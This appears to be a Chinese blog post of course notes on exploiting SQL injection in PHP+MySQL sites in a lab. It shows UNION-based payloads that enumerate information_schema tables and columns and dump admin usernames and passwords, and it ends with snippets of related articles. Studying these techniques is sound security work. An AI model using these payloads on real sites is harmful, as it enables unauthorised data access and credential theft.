2. 程式人生 > >SQL註入漏洞的分析與利用(三)

SQL註入漏洞的分析與利用(三)

阿新 發佈:2018-01-20
和數 form 打開 用戶 data 用戶名 text 必須 存儲

MySQL數據庫:

元數據庫information_schema
1.在5.0以後版本的MySQL中存在著一個元數據庫information_schema,其中存儲著用戶在MySQL中創建的所有其他數據庫的信息
2.在對php+mysql類網站進行註入時,主要就是針對information_schema數據庫進行操作

information_schema中比較重要的數據表
1.schemata:用於存放所有數據庫的名字
2.tables:用於存放所有數據庫中的數據表的名字
3.columns:用於存放所有數據庫的所有數據表中所有字段的名字

php+mysql註入

實驗環境:
實驗平臺: NPMserv(必須放在根目錄下使用)

目標網站: 平臺上的網站

MySQL基本操作
1.select version(); 查看mysql版本
2.select user(); 查看當前用戶
3.select database(); 查看當前打開的數據庫
4.show database; 查看mysql中共有那些數據庫
5.use test; 打開test數據庫
6.show tables; 顯示數據庫中的表
常規操作
判斷可顯示字段
union select 1,2,3,4
MySQL中在執行聯合查詢時,後面的查詢語句不必非要指定數據表名,這點區別於Access
所以可執行:
技術分享圖片

1.判斷是否為註入點

技術分享圖片
顯示正常
技術分享圖片
顯示不正常
由此可以判斷出是一個註入點

2.使用order by 猜出字段數
技術分享圖片
可知字段數為4
3.執行union查詢
技術分享圖片
不必非要指定數據表的名字
技術分享圖片
在前面加一個and 1=2使得頁面得出後面的內容
因為元數據庫只有在5.0版本之後才有,所以要得到數據庫版本
技術分享圖片
技術分享圖片

4.爆出敏感信息
1.爆出當前用戶名和數據庫名
union select 1,2,user(),database(),4
2.爆出govcn數據庫中包含的數據表
union select 1,table_name,3,4 from information_schema.tables where table_schema="govcn"
通過group_concat()函數可以顯示字段中的所有內容。

技術分享圖片

得出結果:

技術分享圖片

5.利用information_schema查看其他數據庫的內容
1.查看test數據庫中包含了那些表
select table_name from information_schema.tables where table_schema="test";
2.查看hack數據表中包含了哪些字段
select column_name from information_schema.columns where table_name="hack";

爆字段名:
union select 1,username,password,4 from information_schema.columns where table_name="admin"

爆用戶名和密碼

union select 1,username,password,4 from admin
union select 1,unhex(hex(username)),unhex(hex(password)),5 from admin

利用unhex(hex())函數進行編碼轉換,解決網站編碼不一致的問題

技術分享圖片

曲廣平老師課程的學習筆記

SQL註入漏洞的分析與利用(三)

相關推薦

SQL漏洞分析利用

和數 form 打開 用戶 data 用戶名 text 必須 存儲 MySQL數據庫: 元數據庫information_schema1.在5.0以後版本的MySQL中存在著一個元數據庫information_schema,其中存儲著用戶在MySQL中創建的所有其他數據庫的信

SQL漏洞分析利用

ces mysql 得出 必須 排序 快速搭建 oracle 學習筆記 min SQL註入的核心思想 黑客在正常的需要調用數據庫的URL後面構造一段數據庫查詢代碼,然後根據返回的結果,從而獲得想要的某些數據。SQL結構化查詢語言,絕大多數關系型數據庫(MySQL、Acces

SQL漏洞分析利用

manage 如果 得到 nio 學習筆記 sql註入 .com 密碼 vpd Access手工註入 1.實驗環境:實驗平臺:小旋風ASPWeb服務器目標網站:南方數據2.02.打開網站,隨意點開一個頁面看到?id=4說明有參數傳遞,用的是get方法,可能是一個註入點加入判

[CVE-2017-5487] WordPress <=4.7.1 REST API 內容漏洞分析復現

tps 文章 分析 請求 利用 api文檔 each includes 什麽 不是很新的漏洞,記錄下自己的工作任務 漏洞影響: 未授權獲取發布過文章的其他用戶的用戶名、id 觸發前提:wordpress配置REST API 影響版本:<= 4.7 0x01漏洞

python進階之資料分析展示

資料分析之表示 資料存取與函式 資料的CSV檔案存取 CSV (Comma‐Separated Value, 逗號分隔值) CSV是一種常見的檔案格式,用來儲存批量資料。 np.savetxt(frame, array, fmt=’%.

redis原始碼分析思考——字典中鍵的兩種hash演算法

      在Redis字典中,得到鍵的hash值顯得尤為重要,因為這個不僅關乎到是否字典能做到負載均衡,以及在效能上優勢是否突出,一個良好的hash演算法在此時就能發揮出巨大的作用。而一個良好的has

mysql慢查詢原因分析解決——索引及查詢優化

索引的型別 Ø 普通索引:這是最基本的索引型別,沒唯一性之類的限制。 Ø 唯一性索引:和普通索引基本相同,但所有的索引列值保持唯一性。 Ø 主鍵:主鍵是一種唯一索引,但必須指定為”PRIMARY KEY”。 Ø 全文索引:MYSQL從3.23.23開始支援全

資料庫鎖表的分析解決

ORACLE裡幾種鎖模式 遇到一個多事務併發的問題 mysql資料庫鎖 推薦圈子: Pipboy 更多相關推薦 對鎖機制的研究要具備兩個條件: 1.資料量大 2.多個使用者同時併發 如果缺少這兩個條件,資料庫不容易產生死鎖問題。研究起來可能會事倍功半。如果這兩個條件都有,但

、ADO.Net基礎【05】SQL漏洞SQLInjection

字符串 大於 拼接 匹配 常用 ado 執行 註入漏洞 基礎 使用字符串拼接的方式把sql語句所需參數拼接到將要執行的sql語句中(參數一般只sql語句的過濾條件),對於用戶的惡意輸入可能導致不一的查詢結果 例如:一個登錄的例子(UserName和Password是用戶的輸

Joomla!3.7.0 Core SQL漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造

【安全牛學習筆記】初識sql漏洞原理

信息安全 sql security+ 網站沒有對輸入的字符進行過濾,導致輸入的字符影響到網站數據的查詢。編程 數學邏輯思維 and or xor 且 或 否 或:有一個真就是真 且:有一個假就為假 否:相反怎麽找是否有註入漏洞? 第一個找符合參數鏈接的網站

ref:ThinkPHP Builder.php SQL漏洞(<= 3.2.3)

syntax tle AR turn sql註入 cat 類型 times execute ThinkPHP Builder.php SQL註入漏洞(<= 3.2.3) ref:https://www.jianshu.com/p/18d06277161e TimeSH

Zabbix sql漏洞腳本執行反彈shell

腳本執行 ucc shell UC 編寫 密碼 我們 zabbix 執行 exp檢測是否存在SQL註入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------

網站漏洞修復方案防止SQL×××漏洞

單引號 註入漏洞 很多 api 影響 數值 簡單 HP 存在 SQL註入漏洞在網站漏洞裏面屬於高危漏洞,排列在前三,受影響範圍較廣,像asp、.net、PHP、java、等程序語言編寫的代碼,都存在著sql註入漏洞,那麽如何檢測網站存在sql註入漏洞? SQL註入漏洞測試方

怎麽修復網站漏洞之metinfo遠程SQL漏洞修補

導致 腳本 mark 技術分享 -o 詳情 報告 過濾 新版本 2018年11月23日SINE網站安全檢測平臺,檢測到MetInfo最新版本爆出高危漏洞,危害性較大,影響目前MetInfo 5.3版本到最新的 MetInfo 6.1.3版本,該網站漏洞產生的主要原因是Met

discuzX3.2 X3.4網站漏洞修復 SQL漏洞修復

比較 class linux c php環境 數據 如何 127.0.0.1 由於 效果 2018年12月9日,國內某安全組織,對discuz X3.2 X3.4版本的漏洞進行了公開,這次漏洞影響範圍較大,具體漏洞是discuz 的用戶前段SQL註入與請求偽造漏洞,也俗稱×

SSRF漏洞分析利用

轉自:http://www.4o4notfound.org/index.php/archives/33/#pingback-26 作者: 404notfound 時間: 2017-05-25 分類: 網路安全,程式碼審計 瀏覽: 5812 前言:總結了一些常見的姿勢,以PH

懸鏡安全丨Java 反序列化任意程式碼執行漏洞分析利用

本文首發平臺:懸鏡官網,如需轉載,請聯絡小編,謝謝。        2015年的1月28號,Gabriel Lawrence (@gebl)和Chris Frohoff (@frohoff)在AppSecCali上給出了一個報告[3],報告中介紹了Java反序列化漏洞可以利用Apache Commons

SQL漏洞總結

php 自己 用戶 5.7 定義 註意 3.2 cap url 目錄: 一、SQL註入漏洞介紹 二、修復建議 三、通用姿勢 四、具體實例 五、各種繞過 一、SQL註入漏洞介紹: SQL註入攻擊包括通過輸入數據從客戶端插入或“註入”SQL查詢到應用程序。一個成

SQL Server索引進階第十一篇:索引碎片分析解決

索引設計是資料庫設計中比較重要的一個環節,對資料庫的效能其中至關重要的作用,但是索引的設計卻又不是那麼容易的事情,效能也不是那麼輕易就獲取到的,很多的技術人員因為不恰當的建立索引,最後使得其效果適得其反,可以說“成也索引,敗也索引”。 相關有關索引碎片的問題,大家應該是聽過不少,也許也很多的朋友